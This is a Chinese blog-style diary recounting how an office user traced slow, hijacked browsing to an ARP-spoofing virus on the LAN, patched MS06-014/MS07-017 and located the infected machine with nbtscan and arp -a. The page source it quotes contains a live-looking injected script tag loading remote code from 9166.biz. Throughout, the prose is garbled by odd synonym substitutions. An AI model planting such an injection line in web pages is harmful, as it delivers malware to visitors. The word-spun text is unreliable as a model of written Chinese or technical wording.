Arp病毒日记[网络技术]

文章作者:CCN
上午

掀创办公室电脑的浏览器上网,翻开速度出奇的慢,并且翻开霏凡后还呈现页面错误,查看一下错误提醒,呈现一个网址 http://9166.biz/1.htm 代码错误,看来浏览器有病毒“劫持”了,ping了一下,还是个韩国的地址!

1 . 主要做的察看进程:冰刃里没有可疑进程,服务里也没发现可疑的!这就怪了?hijack日记基本上干干净净,启动项目页无非常!

2.  翻开杀软nod32,进级后在内存和系统盘终没有查到病毒,同时在安全情势下用Dr.Web查毒,也没有发现,这下我真正忧郁了!最信任的Dr.Web都没有发现!

细心解析一下:在翻开网页时杀软有病毒报警,”IE浏览器成立了一个病毒进程”,”自动删除”,革新页面重新呈现病毒报警!看来是网页病毒!重翻开冰刃,在端口衔接中看到 ie进程衔接到病毒网站的 ip!看来,大概浏览器设置有问题,大概有dll木马插入ie进程!

3. 按照技术区的朋友说的 ,搜索系统文件夹,搜索内容为该网站地址,但一无所获,清理完ie的暂时文件夹,看看局域网代理设置也是空的,上googel,没有问题,进 霏凡的时刻又提醒“正在翻开http://9166.biz/1.htm ”,又跑进来了还是根本没送走?进51.com的个人主页根本不行!

换用了火狐,一样会在端口衔接里看到我 可爱的火狐 和那恶意网站手握手已经成立衔接,唉,真忧郁,我猜疑还是dll劫持,但解析了ie和火狐的dll,太多,杀软又无法查到,真的不知所措!

下午

下个360的专杀工具,没有查到!忧郁!

到bbs问问网友吧!听听龙族朋友的看法:

“开机,F8,挑选“带网络衔接的安全情势”
进入系统后下载安装这两个程序
http://dl.360safe.com/setup.exe
http://tool.ikaka.com/DownloadTool.asp?tools=1
辨别用它们修复系统,清理地痞软件”

“试试avg杀毒看看啦....”

基本还是查毒为主,一一试了,还是不管用,一位朋友说到（局域网电脑传染了ARP病毒,该病毒会改正同网段电脑的ARP表,使同网段全部电脑的路由通过染毒机械,病毒会将HTTP包解包今后,加上病毒代码后重新封包,转发出去.该病毒是操纵微软操作系统得MS06-014和MS07-017漏洞传达的,假如没有安装这两个漏洞的补钉,拜候带病毒的网页,大概同网段有机械带毒,就会被传染成为毒源.）呵呵,那就打补钉吧,装好MS06-014和MS07-017补钉,翻开网页没报错了,但速度还是有点影响,既然说到病毒会将HTTP包加病毒代码重新封装转发,我想到是不是网页代码被改正了,不由得查看一下有问题网页的源代码,第一行赫赫显示着<script src=http://9166.biz/w.js></script> ,看来真如所料,是arp病毒!

【办理办法】既然肯定是arp病毒,开个cmd,输入 nbtscan -r 10.10.10.0/24,注意这个号令有时察看不完好,需求跟个 arp -a号令查看 arp表,察看到一mm的电脑跟网关电脑的 mac地址相同,给mm传个 360 的专杀工具,1秒就搞定,重新启动,总算网络安定!